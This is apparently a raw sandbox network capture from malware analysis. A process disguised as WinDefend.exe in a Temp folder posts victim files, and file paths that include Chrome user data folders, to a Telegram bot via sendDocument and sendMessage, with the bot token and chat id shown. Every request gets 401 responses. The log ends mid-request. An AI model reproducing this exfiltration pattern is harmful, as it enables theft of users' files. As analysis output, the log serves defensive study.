2024-05-23 13:34:30 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 61 63 65 33 65 61 31 65 2d 62 35 32 65 2d 34 61 66 38 2d 62 32 63 66 2d 36 65 35 36 32 66 66 33 36 65 61 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --ace3ea1e-b52e-4af8-b2cf-6e562ff36eadContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:30 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:30 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 61 63 65 33 65 61 31 65 2d 62 35 32 65 2d 34 61 66 38 2d 62 32 63 66 2d 36 65 35 36 32 66 66 33 36 65 61 64 2d 2d 0d 0a Data Ascii: --ace3ea1e-b52e-4af8-b2cf-6e562ff36ead--
2024-05-23 13:34:30 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:30 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	61086	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:30 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="9bbcc1e4-a650-43d4-8bc8-1ae3af992f7b" Host: api.telegram.org Content-Length: 8280 Expect: 100-continue
2024-05-23 13:34:30 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:30 UTC	40	OUT	Data Raw: 2d 2d 39 62 62 63 63 31 65 34 2d 61 36 35 30 2d 34 33 64 34 2d 38 62 63 38 2d 31 61 65 33 61 66 39 39 32 66 37 62 0d 0a Data Ascii: --9bbcc1e4-a650-43d4-8bc8-1ae3af992f7b
2024-05-23 13:34:30 UTC	93	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 31 32 38 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 31 32 38 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=128.png; filename*=utf-8''128.png
2024-05-23 13:34:30 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 06 00 00 00 c3 3e 61 cb 00 00 1e e1 49 44 41 54 78 9c ed 7d 79 98 5d 55 95 ef ef b7 f6 3e 77 aa 31 95 01 48 20 10 15 10 99 22 83 a0 80 13 43 24 2a 18 14 07 14 85 6e 50 5f fb f9 6c 1b 1f 6f 88 21 37 02 5f f3 9a 27 ad f4 fb fa 35 b4 f6 60 0b 22 d0 a4 1d a0 05 64 72 1e 48 10 11 db 09 9a c1 40 12 42 c6 1a ee 70 f6 5a ef 8f 73 ce ad 4a ac 24 35 dc ba b7 22 f5 fb be a4 be a4 ee 3d 67 9d bd d7 5e 7b ad f5 5b 7b 1d 60 06 33 98 c1 0c 66 30 83 19 cc 60 06 33 98 c1 0c 66 30 83 19 bc 54 c0 76 0b d0 04 10 65 10 8f a7 cf 72 e4 14 3f d3 e3 b0 f4 3e 86 32 0c 48 ff 3d 83 96 83 38 1f ae dd 42 a4 32 ec b3 0b 69 df 13 dc 52 99 99 ae bc f2 21 85 59 98 f3 0a 07 3f 87 b0 12 a1 85 e1 0f 37 4b 3f c2 f0 ed Data Ascii: PNGIHDR>aIDATx}y]U>w1H "C$*nP_lo!7_'5`"drH@BpZsJ$5"=g^{[{`3f0`3f0Tver?>2H=8B2iR!Y?7K?
2024-05-23 13:34:30 UTC	3866	OUT	Data Raw: ec 23 dd 72 02 96 32 b1 e3 c2 f8 26 2d 1d d4 e3 bf 7c de 05 52 90 9b b4 ae 3a d2 e6 b7 95 ed 23 41 b5 5a 88 f5 e4 47 2e 5c fd 28 c6 e9 f9 ef f9 3e a9 ed bd 1f 6f 50 73 f7 99 65 9e e0 88 47 6f 2d 92 ee 63 30 85 11 8c 40 d1 70 36 df 8c bb c7 9b 1b 18 8f 05 20 00 1c 79 eb 92 3e 44 5c 0e 11 05 91 76 f4 6a 8f e7 bf 13 db 57 74 a2 aa 37 3c 72 e1 ea 47 b3 83 28 cd bb 4f 7a c2 ec cd 78 c8 d4 6e 71 45 0a d0 60 0b db 14 16 d2 0c a4 d1 54 3c 11 ab 2b db c3 28 ad 1a 8d e8 da 03 c6 ae 00 65 10 65 68 5e 4b ff c5 15 dc ab b4 1a 2b d2 b0 6f bc d2 37 0b 0d b6 cf 3b 09 43 f1 33 21 ae 5f 0b 03 a7 a4 e3 46 3a b0 ce 6b 39 ae d8 16 f1 10 00 a1 7d 61 e1 88 ee 63 c9 a9 a2 93 eb 9b e5 83 e5 71 86 85 e3 51 00 3d e6 d6 b7 2f 22 f9 29 ad 84 c6 c9 9e 76 84 7d 23 0f 78 27 3e 31 c5 e2 Data Ascii: #r2&-\|R:#AZG.\(>oPseGo-c0@p6 y>D\vjWt7<rG(OzxnqE`T<+(eeh^K+o7;C3!_F:k9}acqQ=/")v}#x'>1
2024-05-23 13:34:30 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 39 62 62 63 63 31 65 34 2d 61 36 35 30 2d 34 33 64 34 2d 38 62 63 38 2d 31 61 65 33 61 66 39 39 32 66 37 62 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --9bbcc1e4-a650-43d4-8bc8-1ae3af992f7bContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:30 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:30 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 39 62 62 63 63 31 65 34 2d 61 36 35 30 2d 34 33 64 34 2d 38 62 63 38 2d 31 61 65 33 61 66 39 39 32 66 37 62 2d 2d 0d 0a Data Ascii: --9bbcc1e4-a650-43d4-8bc8-1ae3af992f7b--
2024-05-23 13:34:31 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:31 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	61087	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:30 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="8cb98721-d75f-4598-b4e1-c08a62a90c3f" Host: api.telegram.org Content-Length: 61700 Expect: 100-continue
2024-05-23 13:34:30 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:30 UTC	40	OUT	Data Raw: 2d 2d 38 63 62 39 38 37 32 31 2d 64 37 35 66 2d 34 35 39 38 2d 62 34 65 31 2d 63 30 38 61 36 32 61 39 30 63 33 66 0d 0a Data Ascii: --8cb98721-d75f-4598-b4e1-c08a62a90c3f
2024-05-23 13:34:30 UTC	105	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 74 65 6d 70 6c 61 74 65 31 2e 70 64 66 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 74 65 6d 70 6c 61 74 65 31 2e 70 64 66 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=template1.pdf; filename*=utf-8''template1.pdf
2024-05-23 13:34:30 UTC	4096	OUT	Data Raw: 25 50 44 46 2d 31 2e 36 0d 25 e2 e3 cf d3 0d 0a 31 30 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 35 35 38 38 33 2f 4f 20 31 33 2f 45 20 35 30 30 32 32 2f 4e 20 31 2f 54 20 35 35 36 33 36 2f 48 20 5b 20 31 31 31 36 20 32 35 37 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 78 72 65 66 0d 0a 31 30 20 34 31 0d 0a 30 30 30 30 30 30 30 30 31 36 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 33 37 33 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 34 36 37 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 37 30 36 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 32 31 33 34 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 32 31 39 34 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 Data Ascii: %PDF-1.6%10 0 obj<</Linearized 1/L 55883/O 13/E 50022/N 1/T 55636/H [ 1116 257]>>endobj xref10 410000000016 00000 n0000001373 00000 n0000001467 00000 n0000001706 00000 n0000002134 00000 n0000002194 00000 n000000
2024-05-23 13:34:31 UTC	4096	OUT	Data Raw: 33 32 2f 44 65 73 63 65 6e 74 20 2d 32 35 30 2f 46 6f 6e 74 42 42 6f 78 5b 2d 34 36 20 2d 32 35 30 20 31 31 32 36 20 38 38 31 5d 2f 41 73 63 65 6e 74 20 38 38 31 2f 46 6f 6e 74 46 61 6d 69 6c 79 28 4d 79 72 69 61 64 20 50 72 6f 29 2f 43 61 70 48 65 69 67 68 74 20 36 37 34 2f 58 48 65 69 67 68 74 20 34 38 34 2f 54 79 70 65 2f 46 6f 6e 74 44 65 73 63 72 69 70 74 6f 72 2f 49 74 61 6c 69 63 41 6e 67 6c 65 20 30 3e 3e 0d 65 6e 64 6f 62 6a 0d 31 39 20 30 20 6f 62 6a 0d 3c 3c 2f 52 65 63 74 5b 31 37 39 2e 33 33 34 20 35 39 34 2e 37 35 35 20 31 39 37 2e 37 30 39 20 36 37 37 2e 31 34 38 5d 2f 53 75 62 74 79 70 65 2f 57 69 64 67 65 74 2f 46 20 34 2f 50 20 31 33 20 30 20 52 2f 51 20 31 2f 54 28 64 61 74 65 29 2f 56 28 4a 55 4e 45 20 36 2c 20 32 30 30 36 29 2f 44 41 Data Ascii: 32/Descent -250/FontBBox[-46 -250 1126 881]/Ascent 881/FontFamily(Myriad Pro)/CapHeight 674/XHeight 484/Type/FontDescriptor/ItalicAngle 0>>endobj19 0 obj<</Rect[179.334 594.755 197.709 677.148]/Subtype/Widget/F 4/P 13 0 R/Q 1/T(date)/V(JUNE 6, 2006)/DA
2024-05-23 13:34:31 UTC	4096	OUT	Data Raw: d5 2d 55 8d 87 4e ce ab e0 95 a8 4a 55 2a 09 ca f9 14 ea 69 3d c8 46 b9 60 7c 8c 19 42 8c 14 89 06 78 4a d4 8f ef a9 6b aa 38 29 05 f2 4a ac 8c f6 2e 0b 5e eb 2f 8d 59 77 a8 2a 8f 2e 0a c3 b5 c7 fa b4 c3 52 58 f0 ea 19 10 0f 95 57 92 1a e9 ba 94 f5 7f 4d 92 16 7c 51 52 b2 83 ae 07 7f 1c ca 78 33 37 07 bd 37 c0 e3 2e b7 75 12 6a d9 cd 7d d8 cf e5 8f 45 a5 7f ce a7 fd 8b 83 b7 ae 5d 27 88 88 f8 83 13 b2 92 20 c5 14 e2 00 05 f3 ef c3 2c b0 00 71 c0 43 c4 0f 4e 50 29 b3 a8 12 5e 25 70 6e bd 02 fa 48 fd 9e da f2 ea 52 01 72 9f 6e 22 3d 7e 7f ef 43 29 5d b5 e7 c0 de bf 50 e7 eb 2e 1e fb 0f db 55 1a 15 c5 95 85 d3 36 5d cd 18 a7 47 a9 53 08 5d 4e d5 08 6a 5c 19 59 44 51 71 3b 82 88 a0 08 41 90 b8 20 b4 0e 28 2e ec 8b 27 11 31 c8 22 8b 18 35 ac c1 05 22 82 d2 2a Data Ascii: -UNJUi=F`\|BxJk8)J.^/Yw.RXWM\|QRx377.uj}E]' ,qCNP)^%pnHRrn"=~C)]P.U6]GS]Nj\YDQq;A (.'1"5"*
2024-05-23 13:34:31 UTC	4096	OUT	Data Raw: e6 53 3c aa 9c 60 83 d2 1f 67 f2 c3 18 bf d1 25 6a 7d 08 73 1e 8a ab 8f c9 92 ca 9b b4 ad 18 95 9e 8e e1 fe 90 da e5 67 59 df e3 31 c5 35 8a f3 a7 ce 5c 6e a8 48 e1 8e 30 a5 d7 09 f3 de 50 93 92 7e c7 c7 c7 63 53 cd 27 96 28 f6 46 fc 89 84 30 45 f8 ee 68 df 90 a0 e2 a2 58 46 8a 0e 72 fd 2a 35 bf a4 c7 66 64 98 8a 1d c1 14 72 f6 f4 fa 1e 99 25 d4 05 ff c3 a1 c7 63 99 84 d2 73 da 1a ba fc e4 97 5f 9a d9 cc 1e 22 33 4d 9b 15 4f 2b 53 ca 3b 58 28 00 9b 1e 64 03 d6 12 69 14 d7 1f 2e 10 c2 a6 cf 02 a9 16 aa 81 8f e3 93 65 2e a8 89 4c d1 6b 32 74 8c 4a 13 1e be 91 76 df 73 fd 09 0b 25 2e e8 bc 04 79 3c 0e fd 61 f8 72 4b d5 51 41 79 93 0f ba 13 77 49 7d 65 76 7d b3 42 3a ef 80 c5 6b 32 95 89 0f a6 62 4d 38 0f f8 4e 24 13 0f 48 f0 e7 93 89 45 a4 13 3a 8e bd 8f 26 Data Ascii: S<`g%j}sgY15\nH0P~cS'(F0EhXFr*5fdr%cs_"3MO+S;X(di.e.Lk2tJvs%.y<arKQAywI}ev}B:k2bM8N$HE:&
2024-05-23 13:34:31 UTC	4096	OUT	Data Raw: 4d cd e9 cf b7 3c 98 67 5e 54 99 9f c8 62 79 fe b2 09 37 49 83 64 69 e3 24 df b0 00 fc f9 82 87 2e f3 54 19 75 60 05 66 37 2e 6c ea ec bf ab ef f4 b6 8e cf 4c 4a 4f 16 52 65 8e 61 c1 a7 9d 05 5f 37 fb 75 78 0b 35 81 e5 61 9e 02 f7 00 5f db 90 b0 bf 15 45 08 29 f7 04 1b 82 2a 4b ac 6b 4d d7 32 c0 99 18 7b 36 ed d5 e1 dd c6 06 37 48 2b 9b 04 4d aa da ae 72 21 75 a0 a0 b4 b0 be 49 00 ab 2d 06 3f 15 b9 c6 07 f8 09 3d bc c3 6d 11 29 58 76 c6 19 2d 85 36 09 cc ea cf 62 cb b9 65 0a cb 78 30 56 21 a3 c0 81 4b 4d ee 38 5d 70 72 5a 43 e4 a0 59 92 57 04 4f 87 4c 8c b2 51 4e 9b 71 33 b6 bb ce 28 74 14 ea b9 bc 20 74 48 02 c7 a6 bd 56 98 c2 9f 5a 80 c4 05 ea 81 31 d2 18 8b cb ee 10 e9 a4 38 69 7f 98 d9 1b 31 79 8f 05 95 f9 cf 07 66 b9 19 f0 2d a1 24 dd 6a 7a 52 6b 99 Data Ascii: M<g^Tby7Idi$.Tu`f7.lLJORea_7ux5a_E)*KkM2{67H+Mr!uI-?=m)Xv-6bex0V!KM8]prZCYWOLQNq3(t tHVZ18i1yf-$jzRk
2024-05-23 13:34:31 UTC	4096	OUT	Data Raw: 3c 2f 53 75 62 74 79 70 65 2f 54 79 70 65 31 2f 46 6f 6e 74 44 65 73 63 72 69 70 74 6f 72 20 32 37 20 30 20 52 2f 4c 61 73 74 43 68 61 72 20 32 35 35 2f 57 69 64 74 68 73 5b 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 30 32 20 32 36 38 20 33 39 37 20 35 35 30 20 35 35 35 20 38 38 30 20 36 37 38 20 32 30 35 20 33 31 34 20 33 31 34 20 34 35 34 20 35 39 36 20 32 36 30 20 33 32 32 20 32 36 30 20 33 33 31 20 35 35 35 20 35 Data Ascii: </Subtype/Type1/FontDescriptor 27 0 R/LastChar 255/Widths[202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 268 397 550 555 880 678 205 314 314 454 596 260 322 260 331 555 5
2024-05-23 13:34:31 UTC	4096	OUT	Data Raw: 2a d9 fa 32 58 a1 95 94 c4 de 64 9f 5e 86 b5 9c 94 84 6b 95 1f 54 5d bd 60 1c a9 98 d4 0b dc e5 51 12 26 90 9a 41 df 97 c0 bc b4 a8 92 f2 15 d2 3f e1 01 f7 b2 2b df 4d 25 e5 a3 ae e7 df 1f 3b 5e a2 3d 2c c0 82 7d ca de 94 8e c3 75 ae 2b 09 e2 94 43 55 92 25 ba 93 8a 76 c9 3f c3 54 52 12 c4 2a d5 f8 d7 9e 6e 44 ba 2b 53 b8 0f f5 23 ae 60 9f 4a b5 21 b7 24 e5 10 cb 15 ab f4 67 0b 2b 4f 54 59 b2 91 a7 aa cf d7 b6 69 9e f8 dd c5 21 d3 fd 53 92 57 08 c7 48 1c 8a 0f 55 e6 99 f9 5a fd fe 84 55 9a 55 f1 51 d1 cb 04 76 65 e8 e2 0d 4b 0c 81 86 78 3b 36 ee 1a a6 fe b9 89 59 44 e1 ff a9 89 01 d7 f4 a6 0f 37 be 7c 0c e1 0f 7f bf 6a 7d a1 ed d1 6f f0 cb 3d b6 9d 04 f1 15 c7 d6 7d b5 25 32 64 19 1f 9d 5a 7e aa ad ae b9 65 4f 5e 56 d6 3f c4 db 28 71 29 ba 80 f4 40 1e 3f Data Ascii: 2Xd^kT]`Q&A?+M%;^=,}u+CU%v?TRnD+S#`J!$g+OTYi!SWHUZUUQveKx;6YD7\|j}o=}%2dZ~eO^V?(q)@?
2024-05-23 13:34:31 UTC	4096	OUT	Data Raw: a5 c8 4d 55 c9 f1 62 2a 83 ca 90 63 0c ff 9b 58 b4 00 85 a7 db de cd e0 95 58 cb f9 25 5c 4c bf 09 19 71 38 b7 b8 60 3f a3 d1 6a f6 17 b0 39 a9 29 8a 3d b9 7b 54 a9 f9 99 07 8e a3 19 e2 ce 43 03 35 7f ec ed ef 3b fb e9 35 08 05 12 6e 72 24 31 00 69 34 c9 05 3b 35 29 78 bf fb 9a f2 cc 05 2d ab 40 23 16 a1 df 1e 04 07 c0 0f af d1 ba 92 df 38 d3 ba 12 1c 50 ae 8e 6c 36 19 db 4c 6d 30 17 fc c5 f7 27 e6 20 07 d8 5d 28 48 4e 4a 53 24 ef 46 6e 28 58 fc 82 77 41 eb 30 34 df 71 6c 1d 8b 07 3b 97 e7 d4 08 35 de 8a a5 29 35 72 55 5b 1a 23 67 14 da 94 42 39 4b 3d d0 ca b5 72 05 33 f7 52 ec 08 4b 8d 98 bf cc 22 23 8b b3 4d dd 4c 8d ae 4e 5f cf ea 1a b8 a6 5b 3c 9c d0 12 5c 2e d4 09 fa 2b da 5a 8a 6e 0a 9b b4 8d 85 0d ac b6 be b0 ae 86 e9 ae 6e ea 29 66 6b ef ec 22 a9 Data Ascii: MUb*cXX%\Lq8`?j9)={TC5;5nr$1i4;5)x-@#8Pl6Lm0' ](HNJS$Fn(XwA04ql;5)5rU[#gB9K=r3RK"#MLN_[<\.+Znn)fk"
2024-05-23 13:34:31 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:31 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	61088	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:31 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 233 Expect: 100-continue
2024-05-23 13:34:31 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:31 UTC	233	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 35 37 78 35 37 2d 70 72 65 63 6f 6d 70 6f 73 65 64 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 35 37 78 35 37 2d 70 72 65 63 6f 6d 70 6f 73 65 64 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 32 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+apple-touch-icon-57x57-precomposed.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Capple-touch-icon-57x57-precomposed.png%0ASize%3A+2+KB
2024-05-23 13:34:32 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:32 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	61089	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:31 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 349 Expect: 100-continue
2024-05-23 13:34:32 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:32 UTC	349	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 31 39 32 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 Data Ascii: chat_id=1655240967&text=File%3A+192.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applica
2024-05-23 13:34:32 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:32 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	61091	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:32 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 155 Expect: 100-continue
2024-05-23 13:34:32 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:32 UTC	155	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 41 64 6f 62 65 49 44 2e 70 64 66 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 49 44 54 65 6d 70 6c 61 74 65 73 25 35 43 45 4e 55 25 35 43 41 64 6f 62 65 49 44 2e 70 64 66 25 30 41 53 69 7a 65 25 33 41 2b 38 30 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+AdobeID.pdf%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CIDTemplates%5CENU%5CAdobeID.pdf%0ASize%3A+80+KB
2024-05-23 13:34:33 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:32 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	61092	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:32 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="794248ae-12fd-4b7b-bc57-e79898ae7f2a" Host: api.telegram.org Content-Length: 3139 Expect: 100-continue
2024-05-23 13:34:33 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:33 UTC	40	OUT	Data Raw: 2d 2d 37 39 34 32 34 38 61 65 2d 31 32 66 64 2d 34 62 37 62 2d 62 63 35 37 2d 65 37 39 38 39 38 61 65 37 66 32 61 0d 0a Data Ascii: --794248ae-12fd-4b7b-bc57-e79898ae7f2a
